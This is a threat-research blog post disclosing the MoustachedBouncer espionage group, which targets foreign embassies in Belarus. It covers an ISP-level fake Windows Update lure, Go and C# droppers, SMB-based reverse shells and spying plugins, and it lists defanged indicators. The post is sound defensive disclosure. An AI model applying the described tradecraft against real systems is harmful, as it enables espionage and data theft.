{"id":8429,"date":"2023-08-10T12:00:00","date_gmt":"2023-08-10T09:00:00","guid":{"rendered":"https:\/\/blog.eset.ee\/et\/2023\/08\/10\/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\/"},"modified":"2023-08-10T12:00:00","modified_gmt":"2023-08-10T09:00:00","slug":"moustachedbouncer-espionage-against-foreign-diplomats-in-belarus","status":"publish","type":"post","link":"https:\/\/blog.eset.ee\/et\/en\/2023\/08\/10\/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\/","title":{"rendered":"MoustachedBouncer: Espionage against foreign diplomats in Belarus"},"content":{"rendered":"<p>MoustachedBouncer is a cyberespionage group discovered by ESET Research and first publicly disclosed in this blogpost. The group has been active since at least 2014 and only targets foreign embassies in Belarus. Since 2020, MoustachedBouncer has most likely been able to perform <a href=\"https:\/\/attack.mitre.org\/versions\/v11\/techniques\/T1557\/\"><em>adversary-in-the-middle<\/em><\/a> (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets. The group uses two separate toolsets that we have named NightClub and Disco.<\/p>\n<blockquote>\n<p><strong>Key points of this report:<\/strong><\/p>\n<ul>\n<li><em>MoustachedBouncer has been operating since at least 2014.<\/em><\/li>\n<li><em>We assess with medium confidence that they are aligned with Belarus&#8217;s interests.<\/em><\/li>\n<li><em>MoustachedBouncer specializes in the espionage of foreign embassies in Belarus.<\/em><\/li>\n<li><em>MoustachedBouncer has used the adversary-in-the-middle technique since 2020 to redirect captive portal checks to a C&amp;C server and deliver malware plugins via SMB shares.<\/em><\/li>\n<li><em>We believe that MoustachedBouncer uses a lawful interception system (such as SORM) to conduct its AitM operations.<\/em><\/li>\n<li><em>We assess with low confidence that MoustachedBouncer is closely cooperating with Winter Vivern, another group targeting European diplomats but using different TTPs.<\/em><\/li>\n<li><em>Since 2014, the group has been operating a malware framework that we have named NightClub. It uses the SMTP and IMAP (email) protocols for C&amp;C communications.<\/em><\/li>\n<li><em>Starting in 2020, the group has been using, in parallel, a second malware framework we have named Disco.<\/em><\/li>\n<li><em>Both NightClub and Disco support additional spying plugins including a screenshotter, an audio recorder, and a file stealer.<\/em><\/li>\n<\/ul>\n<\/blockquote>\n<blockquote>\n<p>The group&#8217;s intricate tactics, techniques and procedures were also discussed on the ESET Research Podcast. Just press play to learn more from ESET&#8217;s Director of Threat Research Jean-Ian Boutin and ESET Distinguished Researcher Aryeh Goretsky. <\/p>\n<\/p>\n<\/blockquote>\n<h2>Victimology<\/h2>\n<p>According to ESET telemetry, the group targets foreign embassies in Belarus, and we have identified four different countries whose embassy staff have been targeted: two from Europe, one from South Asia, and one from Africa. The key dates are shown in Figure 1.<\/p>\n<figure><img decoding=\"async\" alt=\"MoustachedBouncer_Timeline_edited\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/moustachedbouncer-timeline-edited.png\" title=\"Figure 1. Timeline of MoustachedBouncer activities\" width=\"\"><figcaption>\n<p><a><\/a><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">1<\/span><\/em><span lang=\"EN-US\"><em>. Timeline of MoustachedBouncer activities<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<h2>Attribution<\/h2>\n<p>While we track MoustachedBouncer as a separate group, we have found elements that make us assess with low confidence that they are closely collaborating with another group known as Winter Vivern. The latter was <a href=\"https:\/\/www.domaintools.com\/resources\/blog\/winter-vivern-a-look-at-re-crafted-government-maldocs\/\"><em>discovered<\/em><\/a> in 2021 and is still active as of 2023. In March 2023, Winter Vivern used a known XSS vulnerability (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-27926\"><em>CVE-2022-27926<\/em><\/a>) in the Zimbra mail portal in order to steal webmail credentials of diplomats of several European countries. This campaign was publicly disclosed by <a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability\"><em>Proofpoint<\/em><\/a> researchers.<\/p>\n<p>MoustachedBouncer\u2019s activity spans from 2014 to 2022 and the TTPs of the group have evolved over time. For example, we have first seen them use AitM attacks only in 2020. However, the targeted vertical has stayed the same.<\/p>\n<p>Table 1 shows the characteristics of each campaign. Given these elements, we assess with high confidence that they are all linked to MoustachedBouncer.<\/p>\n<p><em><a><\/a><span lang=\"EN-US\">Table <\/span><span><span lang=\"EN-US\">1<\/span><\/span><\/em><span lang=\"EN-US\"><em>. Connections between the MoustachedBouncer campaigns<\/em><\/span><\/p>\n<\/p>\n<div align=\"center\">\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<tbody>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\">VirusTotal<br \/>(2014)<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\">Victim A (2017)<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">Victim B<br \/><span><br \/>\n<\/span>(2020-2022)<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">Victim C<br \/>(2020-2022)<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\">Victim D<br \/>(2021-2022)<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">NightClub implant<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">NightClub plugins<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">Disco implant<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">SharpDisco dropper<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">Compromise via AitM<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\">?<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\">?<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">?<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">?<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">Malware delivery via AitM on SMB shares<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\"><br \/>\n<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"123\">\n<p><strong><span lang=\"EN-US\">Victims: foreign embassies in Belarus<\/span><\/strong><\/p>\n<\/td>\n<td width=\"79\">\n<p align=\"center\"><strong><span lang=\"EN-US\">? <\/span><\/strong><\/p>\n<\/td>\n<td width=\"83\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"99\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<td width=\"137\">\n<p align=\"center\"><strong><span lang=\"EN-US\">X<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<div align=\"center\">\n<\/div>\n<h2>Compromise vector: AitM<\/h2>\n<p>In this section, we detail the initial access for Disco. We don\u2019t yet know the initial access method MoustachedBouncer uses to install NightClub.<\/p>\n<h3>Fake Windows Update<\/h3>\n<p>To compromise their targets, MoustachedBouncer operators tamper with their victims\u2019 internet access, probably at the ISP level, to make Windows believe it\u2019s behind a captive portal. <a href=\"https:\/\/docs.microsoft.com\/en-us\/troubleshoot\/windows-client\/networking\/internet-explorer-edge-open-connect-corporate-public-network\"><em>Windows 10 checks<\/em><\/a> whether it\u2019s able to access the internet with an HTTP request to <span>http:\/\/www.msftconnecttest.com\/connecttest.txt<\/span>. In case the answer is not <span>Microsoft Connect Test<\/span>, a browser window is opened to <span>http:\/\/www.msftconnecttest.com\/redirect<\/span> . For IP ranges targeted by MoustachedBouncer, the network traffic is tampered at the ISP level, and the latter URL redirects to a seemingly legitimate, but fake, Windows Update URL, <span>http:\/\/updates.microsoft[.]com\/<\/span>. Hence, the fake Windows Update page will be displayed to a potential victim upon network connection. The fake update page is shown in Figure 2. The text we observed is in Russian, most likely because that is the main language used in Belarus, but it is possible that versions in other languages exist. The page indicates that there are critical system security updates that must be installed.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 2. Fake Windows Update page\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/picture1.png\" title=\"Figure 2. Fake Windows Update page\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">2<\/span><\/em><span lang=\"EN-US\"><em>. Fake Windows Update page<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>Note that it is using unencrypted HTTP and not HTTPS, and that the <span>updates.microsoft[.]com<\/span> subdomain does not exist on Microsoft\u2019s nameservers, so it does not resolve on the open internet. During the attack, this domain resolved to <span>5.45.121[.]106<\/span> on the target\u2019s machine. This IP address is used for parking domains and is unrelated to Microsoft. Although this is an internet-routable IP address, traffic to this IP never reaches the internet while the AitM attack is ongoing. Both the DNS resolutions and the HTTP replies were injected in transit, probably at the ISP level.<\/p>\n<p>An important point is that the adversary-in-the-middle (AitM) technique only occurs against a few selected organizations (perhaps just embassies), not countrywide. It is not possible to reproduce the redirection by simply exiting from a random IP address in Belarus.<\/p>\n<h3>Malware delivery<\/h3>\n<p>The HTML page, shown in Figure 2, loads JavaScript code from <span>http:\/\/updates.microsoft[.]com\/jdrop.js<\/span>. This script first calls <span>setTimeout<\/span> to execute the function <span>jdrop<\/span> one second after the page has loaded. That function (see Figure 3) displays a modal window with a button named <span>\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f<\/span> (translation: Get updates).<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 3. jdrop function\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/jdrop.png\" title=\"Figure 3. jdrop function\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">3<\/span><span lang=\"EN-US\">. <\/span><span><span lang=\"EN-US\">jdrop<\/span><\/span><\/em><span lang=\"EN-US\"><em> function<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>A click on the button executes the <span>update<\/span> function, shown in Figure 4.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 4. update function\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/update-js.png\" title=\"Figure 4. update function\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">4<\/span><span lang=\"EN-US\">. <\/span><span><span lang=\"EN-US\">update<\/span><\/span><\/em><span lang=\"EN-US\"><em> function<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>This function triggers the download of a fake Windows Update installer from the legitimate-seeming URL <span>http:\/\/updates.microsoft[.]com\/MicrosoftUpdate845255.zip<\/span>. It also displays some instructions to install the update: <span>\u0414\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439, \u0441\u043a\u0430\u0447\u0430\u0439\u0442\u0435 \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0435 &#8220;MicrosoftUpdate845255.msi&#8221;<\/span>. (translation: To install updates, download and run &#8220;MicrosoftUpdate845255.msi&#8221;).<\/p>\n<p>We were unable to retrieve the downloaded <span>MicrosoftUpdate845255.zip<\/span> file but our telemetry shows it contains a malicious executable named <span>MicrosoftUpdate845255.exe<\/span>.<\/p>\n<p>Written in Go, it creates a scheduled task that executes <span>\\35.214.56[.]2OfficeBrokerOfficeBroker.exe<\/span> every minute. Like the path suggests, it fetches the executable via SMB from <span>35.214.56[.]2<\/span>. This IP address belongs to a Google Cloud customer, but just like the HTTP server, we believe that SMB replies are injected on the fly via AitM and that the attackers don\u2019t control the actual internet-routable IP address.<\/p>\n<p>We have also observed the following SMB servers, intercepted via AitM:<\/p>\n<ul>\n<li><span>\\209.19.37[.]184<\/span><\/li>\n<li><span>\\38.9.8[.]78<\/span><\/li>\n<li><span>\\59.6.8[.]25<\/span><\/li>\n<\/ul>\n<p>We have observed this behavior in two separate ISP networks: Unitary Enterprise A1 and Beltelecom. This suggests that those ISPs may not provide full data confidentiality and integrity. We strongly recommend that foreign organizations in Belarus use an end-to-end encrypted VPN tunnel, ideally out-of-band (i.e., not from the endpoint), providing internet connectivity from a trusted network.<\/p>\n<p>Figure 5 depicts our hypothesis about the compromise vector and the traffic interception.<\/p>\n<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 5. Compromise via AitM scenario\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/slide1.jpeg\" title=\"Figure 5. Compromise via AitM scenario\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">5<\/span><\/em><span lang=\"EN-US\"><em>. Compromise via AitM scenario<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<h3>AitM \u2013 General thoughts<\/h3>\n<p>The AitM scenario reminds us of the Turla and StrongPity threat actors who have trojanized software installers on the fly at the ISP level. <\/p>\n<p>Usually, this initial access method is used by threat actors operating in their own country because it requires significant access inside the internet service providers, or their upstream providers. In many countries, security services are allowed to perform so-called \u201clawful interception\u201d using special devices installed on the ISPs\u2019 premises.<\/p>\n<p>In Russia, a law from 2014 requires ISPs to install devices called <a href=\"https:\/\/en.wikipedia.org\/wiki\/SORM\"><em>SORM-3<\/em><\/a> that enable the Federal Security Service (FSB) to <a href=\"https:\/\/www.csis.org\/analysis\/reference-note-russian-communications-surveillance\"><em>conduct targeted surveillance<\/em><\/a>. The devices have deep packet inspection (DPI) capabilities and were likely used by Turla in its <a href=\"https:\/\/www.welivesecurity.com\/wp-content\/uploads\/2018\/01\/ESET_Turla_Mosquito.pdf\"><em>Mosquito campaign<\/em><\/a>.<\/p>\n<p>In 2018, the Citizen Lab revealed that DPI devices developed by the Canadian company Sandvine were used to modify HTTP traffic in Turkey and Egypt. In Turkey, the devices were allegedly used to redirect internet users to a malicious server when they tried to download certain Windows applications, which is in line with StrongPity activities. In Egypt, those devices were allegedly used to inject ads and cryptocurrency mining scripts in order to generate money.<\/p>\n<p>In 2020, a <a href=\"https:\/\/www.bloomberg.com\/news\/articles\/2020-08-28\/belarusian-officials-shut-down-internet-with-technology-made-by-u-s-firm\"><em>Bloomberg article<\/em><\/a> revealed that Belarus\u2019s National Traffic Exchange Center bought the same Sandvine DPI equipment, but according to a <a href=\"https:\/\/www.cyberscoop.com\/sandvine-belarus-contract-censorship-human-rights\/\"><em>Cyberscoop article<\/em><\/a> the contract was cancelled in September 2020.<\/p>\n<p>According to a <a href=\"https:\/\/www.amnesty.org\/en\/wp-content\/uploads\/2021\/05\/EUR4990452018ENGLISH.pdf\"><em>report by Amnesty International<\/em><\/a> published in 2021, \u201cUnder Belarusian law, all telecommunications providers in the country must make their hardware compatible with the SORM system\u201d. They also state that \u201cThe SORM system allows the authorities direct, remote-control access to all user communications and associated data without notifying the provider\u201d. We assess with low confidence that MoustachedBouncer uses this SORM system to conduct its operations.<\/p>\n<p>While the compromise of routers in order to conduct AitM on embassy networks cannot be fully discarded, the presence of lawful interception capabilities in Belarus suggests the traffic mangling is happening at the ISP level rather than on the targets\u2019 routers.<\/p>\n<h2>Implants: NightClub and Disco<\/h2>\n<p>Since 2014, the malware families used by MoustachedBouncer have evolved, and a big change happened in 2020 when the group started to use AitM attacks. At the same time, it started to use much simpler tools developed in .NET and Go. In reference to NightClub, we named this new toolset Disco.<\/p>\n<p>MoustachedBouncer operates the two implant families in parallel, but on a given machine, only one is deployed at a time. We believe that Disco is used in conjunction with AitM attacks while NightClub is used for victims where traffic interception at the ISP level isn\u2019t possible because of a mitigation such as the use of an end-to-end encrypted VPN where internet traffic is routed outside of Belarus.<\/p>\n<h3>Disco<\/h3>\n<p>As mentioned in the previous section, a fake Windows Update page delivers the first stage (SHA-1: <span>E65EB4467DDB1C99B09AE87BA0A964C36BAB4C30<\/span>). This is a simple dropper written in Go that creates a scheduled task to execute <span>\\35.214.56[.]2OfficeBrokerOfficeBroker.exe<\/span> every minute. <span>OfficeBroker.exe<\/span> is downloaded over the SMB protocol via AitM attack. The dropper\u2019s main function is shown in Figure 6.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 6. Main function of the Go dropper\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-6.png\" title=\"Figure 6. Main function of the Go dropper\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">6<\/span><\/em><span lang=\"EN-US\"><em>. Main function of the Go dropper<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>Finally, the dropper does a DNS query for <span>windows.system.update[.]com<\/span>. This domain does not exist but the DNS request is probably intercepted via AitM, and is likely a beacon to notify the operators that the machine has been successfully compromised.<\/p>\n<p>We were unable to retrieve the <span>OfficeBroker.exe<\/span> file, but it is very likely that it acts as a downloader, since we have observed further plugins being executed from SMB shares. The plugins are developed in Go and are rather simple because they mostly rely on external Go libraries. Table 2 summarizes the different plugins.<\/p>\n<\/p>\n<p><em><a><\/a><span lang=\"EN-US\">Table <\/span><span><span lang=\"EN-US\">2<\/span><\/span><\/em><span lang=\"EN-US\"><em>. Go plugins used by MoustachedBouncer in 2021\u20132022<\/em><\/span><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"97%\">\n<tbody>\n<tr>\n<td width=\"62%\">\n<p><strong><span lang=\"EN-US\">Download URL \/ Path on disk<\/span><\/strong><\/p>\n<\/td>\n<td width=\"37%\">\n<p><strong><span lang=\"EN-US\">Description<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">\\209.19.37[.]184driverpackaact.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Takes screenshots using the <a href=\"https:\/\/github.com\/kbinani\/screenshot\"><em>kbinani\/screenshot<\/em><\/a> library. Screenshots are saved in <\/span><span><span lang=\"EN-US\">.AActdata&lt;d&gt;_&lt;s&gt;.dat<\/span><\/span><span lang=\"EN-US\"> (on the SMB share) where <\/span><span><span lang=\"EN-US\">&lt;d&gt;<\/span><\/span><span lang=\"EN-US\"> is the active display number and <\/span><span><span lang=\"EN-US\">&lt;s&gt;<\/span><\/span><span lang=\"EN-US\"> the date. It sleeps 15 seconds between each screenshot.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">C:UsersPublicdriverpackdriverpackUpdate.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Executes PowerShell scripts with <\/span><span><span lang=\"EN-US\">powershell.exe -NoProfile -NonInteractive &lt;command&gt;<\/span><\/span><span lang=\"EN-US\">, where <\/span><span><span lang=\"EN-US\">&lt;command&gt;<\/span><\/span><span lang=\"EN-US\"> is read from the file <\/span><span><span lang=\"EN-US\">.idata<\/span><\/span><span lang=\"EN-US\">. The output is written in <\/span><span><span lang=\"EN-US\">.odata<\/span><\/span><span lang=\"EN-US\">.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">C:UsersPublicdriverpacksdrive.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Executes <\/span><span><span lang=\"EN-US\">C:UsersPublic\u200cdriverpackdriverpackUpdate.exe<\/span><\/span><span lang=\"EN-US\"> (the plugin above) using elevated rights via <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2021-1732\"><em><span>CVE-2021-1732<\/span><\/em><\/a>. The code was likely inspired by a PoC on <a href=\"https:\/\/github.com\/KaLendsi\/CVE-2021-1732-Exploit\/blob\/main\/ExploitTest\/ExploitTest.cpp\"><em>GitHub<\/em><\/a> and uses the <a href=\"https:\/\/github.com\/zyantific\/zydis\"><em>zydis<\/em><\/a> code generation library.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">\\209.19.37[.]184driverpackofficetelemetry.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">A reverse proxy strongly inspired by the GitHub repository <a href=\"https:\/\/github.com\/kost\/revsocks\"><em>revsocks<\/em><\/a>. We were unable to retrieve the command line parameters with the proxy IP address.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">\\38.9.8[.]78driverpackDPU.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Another sample of the PowerShell plugin.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">%userprofile%appdatanod32updatenod32update.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Another sample of the reverse proxy plugin.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">\\59.6.8[.]25outlooksyncoutlooksync.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Takes screenshots; it is similar to the first plugin. Images are saved in <\/span><span><span lang=\"EN-US\">.\/logs\/${DATETIME}.dat<\/span><\/span><span lang=\"EN-US\">.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">\\52.3.8[.]25oracleoracleTelemetry.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Screenshot plugin packed with <a href=\"https:\/\/www.oreans.com\/Themida.php\"><em>Themida<\/em><\/a>.<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Interestingly, the plugins also use SMB shares for data exfiltration. There is no C&amp;C server outside the attackers\u2019 premises to look at or to take down. There also seems to be no way to reach that C&amp;C server from the internet. This gives high resiliency to the attackers\u2019 network infrastructure.<\/p>\n<h3>SharpDisco and NightClub plugins<\/h3>\n<p>In January 2020 we observed a MoustachedBouncer dropper, which we named SharpDisco, being downloaded from <span>https:\/\/mail.mfa.gov.&lt;redacted&gt;\/EdgeUpdate.exe<\/span> by a Microsoft Edge process. It is not clear how attackers were able to tamper with HTTPS traffic, but it is possible an invalid TLS certificate warning was shown to the victim. Another possibility is that MoustachedBouncer compromised this governmental website.<\/p>\n<h4>SharpDisco (SHA-1: A3AE82B19FEE2756D6354E85A094F1A4598314AB)<\/h4>\n<p>SharpDisco is a dropper developed in C#. It displays a fake update window, shown in Figure 7, while creating two scheduled tasks in the background.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 7. Fake Microsoft Edge update window\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/edge-update.png\" title=\"Figure 7. Fake Microsoft Edge update window\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">7<\/span><\/em><span lang=\"EN-US\"><em>. Fake Microsoft Edge update window<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>These scheduled tasks are:<\/p>\n<p><img decoding=\"async\" alt=\"scheduled tasks\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/scheduled-tasks.png\" title=\"\" width=\"\"><\/p>\n<p><span>WINCMDA.EXE<\/span> and <span>WINCMDB.EXE<\/span> are probably just <span>cmd.exe<\/span> renamed. Every minute, the task reads what is in <span>\\24.9.51[.]94EDGEUPDATEEDGEAIN<\/span> (on the SMB share), pipes it to <span>cmd.exe<\/span>, and writes the output to <span>\\24.9.51[.]94EDGEUPDATEEDGEAOUT<\/span>. It is the same for the second task, but with the <span>EDGEBIN<\/span> and <span>EDGEBOUT<\/span> files. From a higher viewpoint, those tasks are reverse shells with a one-second latency.<\/p>\n<p>Then, as shown in Figure 8, the dropper sends a DNS request for an unregistered domain, <span>edgeupdate-security-windows[.]com<\/span>. This is similar to what the 2022 Disco dropper does.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 8. Dropper used in 2020\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/dropper-2020.png\" title=\"Figure 8. Dropper used in 2020\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">8<\/span><\/em><span lang=\"EN-US\"><em>. Dropper used in 2020<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>ESET telemetry shows that the reverse shell was used to drop a genuine Python interpreter in <span>C:UsersPublicWinTNWinTN.exe<\/span>. We then observed two plugins being dropped on disk by cmd.exe, which means they were likely dropped by the reverse shell as well. The two plugins are:<\/p>\n<ul>\n<li>A recent-files stealer in <span>C:UsersPublicWinSrcNTIt11.exe<\/span><\/li>\n<li>An external drive monitor in <span>C:UsersPublicIt3.exe<\/span><\/li>\n<\/ul>\n<p>It is interesting to note that those plugins share code with NightClub (described in the section NightClub \u2013 2017 (SHA-1: <span>F92FE4DD679903F75ADE64DC8A20D46DFBD3B277<\/span>) below). This allowed us to link the Disco and NightClub 